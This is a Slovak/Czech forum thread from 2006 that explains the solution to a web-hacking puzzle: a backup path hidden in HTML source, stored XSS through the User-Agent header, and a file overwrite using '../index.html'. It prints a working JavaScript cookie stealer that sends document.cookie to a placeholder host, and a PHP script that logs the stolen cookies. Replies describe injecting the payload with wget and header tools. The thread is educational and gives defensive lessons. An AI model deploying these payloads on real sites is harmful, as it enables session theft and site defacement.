hadanka c.5 - vysvetlenie

******* http://pc.poradna.net/question/view/66560-hadanka-c -5-obnov-stranku *******
ok, vidim ze este nie ste pripraveni na real web hacking a preto dalsia hadanka bude lahsia a bude z kategorie basic web hacking. budem sa tu snazit vysvetlit jednotlive kroky a ich dosah, ale rozhodol som sa, ze vam to nepoviem naraz(mam rad napatie). budem to vysvetlovat po jednotlivych krokoch(celkovo su 3) a s tyzdnovym odstupom, aby ste sa este samostatne mohli(aj ked neskoro) dostat do hall of fame.
1., najprv bolo treba najst dolezitu informaciu, kde je vlastne zaloha povodnych stranok. ta sa nachadzala v subore help.html(bolo treba pozriet do zdrojakov a odscrollovat ), na hlavnej stranke link - help.
- ponaucenie: aj ked nasi hackeri boli ocividne spicky, urobili jednu podstatnu chybu a to ze dolezite informacie ulozili do html zdrojakov, aj ked si mysleli ze ich nikto nenajde.

2., tu som chybu urobil ja. urobil som sice monitoring navstevnosti, ktory zabezpecoval script monitoring.php ale neuvedomil som si, ze aj informacie typu user_agent mozu byt zneuzite(user agent switcher(ff), proxomitron(proxy server)). tu mi utocnik vlozil cookie stealer a pri prihlaseni sa pod adminom a prezreti si monitoringu som o svoje cookie prisiel. mozny cookie stealer bol:

<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>
<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>
<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>

nejaky_cookie_citac.php mohol vyzerat takto:

<?php
 $cookie = $_GET['c'];
 $fp = fopen('mycookies.html', 'a');
 fwrite($fp, "$cookie\n<br>");
 fclose($fp);
?>

-ponaucenie: pokial si na svojej stranke zaznamenavate aj informacie typu napr. user_agent, referrer, tak treba mysliet nato, ze aj toto je mozne zneuzit(nie len input z formulara alebo z url) a najlepsie je podla mna zmenit

< a >

na znakove entity:

&#60; a &#62;

, je s tym najmenej roboty.

3., a mame tu posledny bod. stacilo vojst do admin toolu, zadat meno a heslo, ktore sme adminovi ukradli a ako meno suboru uviest index.html a obsah spravy bol prave povodny html kod index.html v adresari _tmp_. bolo si vsak treba uvedomit ze sme v adresari _tmp_, preto ako meno sme pouzili: ../index.html(relativna cesta o uroven vyssie) alebo sme mohli pouzit absolutnu cestu: index.html. akceptovana bola aj index.html. tymto sme prepisali povodny index.html.
-ponaucenie: davajte si velkeho bacha, ak dovolite zapisovat sobory na vas web, aby tam nahodou niekto nezapisal vlastny php shell. :D

Jsou zobrazeny jen nové odpovědi. Zobrazit všechny

Předmět	Autor	Datum
to tam opravdu stacilo zadat pouhy script? ja sem se tam matlal s onload a ruznyma typama uvozovek,… nový angel333-skola 12.12.2006 09:10	angel333-skola	12.12.2006 09:10
Kazdy cookie stealer je len script (ak chces aby pracoval automaticky pri zobrazeni stranky), dokonc… nový MM.. 12.12.2006 10:50	MM..	12.12.2006 10:50
cookie stealer jsem mel u sebe na hostingu, to jo. zkousel jsem ho a fungoval. ale ten javascript...… nový angel333 12.12.2006 19:44	angel333	12.12.2006 19:44
proxomitron je uplne easy. ako dobre vies, user agent sa posiela v hlavicke http packetu, takze si t… nový IgorK 12.12.2006 20:11	IgorK	12.12.2006 20:11
Do FF nepotrebujes ziadne rozsirenie, staci ak si useragenta prepises v about:config (vytvoris poloz… poslední MM.. 30.12.2006 00:45	MM..	30.12.2006 00:45
updated. btw., pripravil som pre vas dalsie 2 hadanky, ale zacneme od zakladov. nebudu teda take taz… nový IgorK 25.12.2006 14:43	IgorK	25.12.2006 14:43

to tam opravdu stacilo zadat pouhy script? ja sem se tam matlal s onload a ruznyma typama uvozovek, ale to mi zase asi orezal wget

Kazdy cookie stealer je len script (ak chces aby pracoval automaticky pri zobrazeni stranky), dokonca staci ak by to bola linka ale na nu by musel admin kliknut. Dolezite je len ze si odosles cookie na svoj server (kam vedie ta linka). Samozrejme musis mat niekde hosting a tvoj php script ktory ti ten cookie niekde ulozi (to je ten druhy 5riadkovy php script).

cookie stealer jsem mel u sebe na hostingu, to jo. zkousel jsem ho a fungoval. ale ten javascript... melo se to zadat do user-agenta, takze jsem si udelal cmd soubor, do nej jsem dal

wget --user-agent <script>blablalba....

ale von me wget jedny uvozovky nak nebral, druhy bral ale nak jinak to neslo, no proste sem neprosel pres svyho wgeta

zkousel jsem i proxytron (nebo jak se to jmenuje), ale ten se mi nepovedlo rozchodit, nak sem vubec nepochopil system tech filtru, tak sem to hned vzdal.

dalsi moznost je samozrejme naky rozsireni do firefoxu, ale ff nepouzivam a instalovat ho.. nechci

proxomitron je uplne easy. ako dobre vies, user agent sa posiela v hlavicke http packetu, takze si to mal nastavit v Headers a tam si mozes pozriet, ako sa to nastavuje napr. pre mozillu a urobit si to podla toho.

Do FF nepotrebujes ziadne rozsirenie, staci ak si useragenta prepises v about:config (vytvoris polozku general.useragent.override).
Ak FF nechces tak to je ale tvoja smola, namiesto 5sekund s FF sa drbes 3dni s nejakymi wget a proximitronmi

updated. btw., pripravil som pre vas dalsie 2 hadanky, ale zacneme od zakladov. nebudu teda take tazke, ale dufam ze sa pri nich dobre pobavite. tato hadanka bola uz z kategorie realistic.

Zpět do poradny Odpovědět na původní otázku Nahoru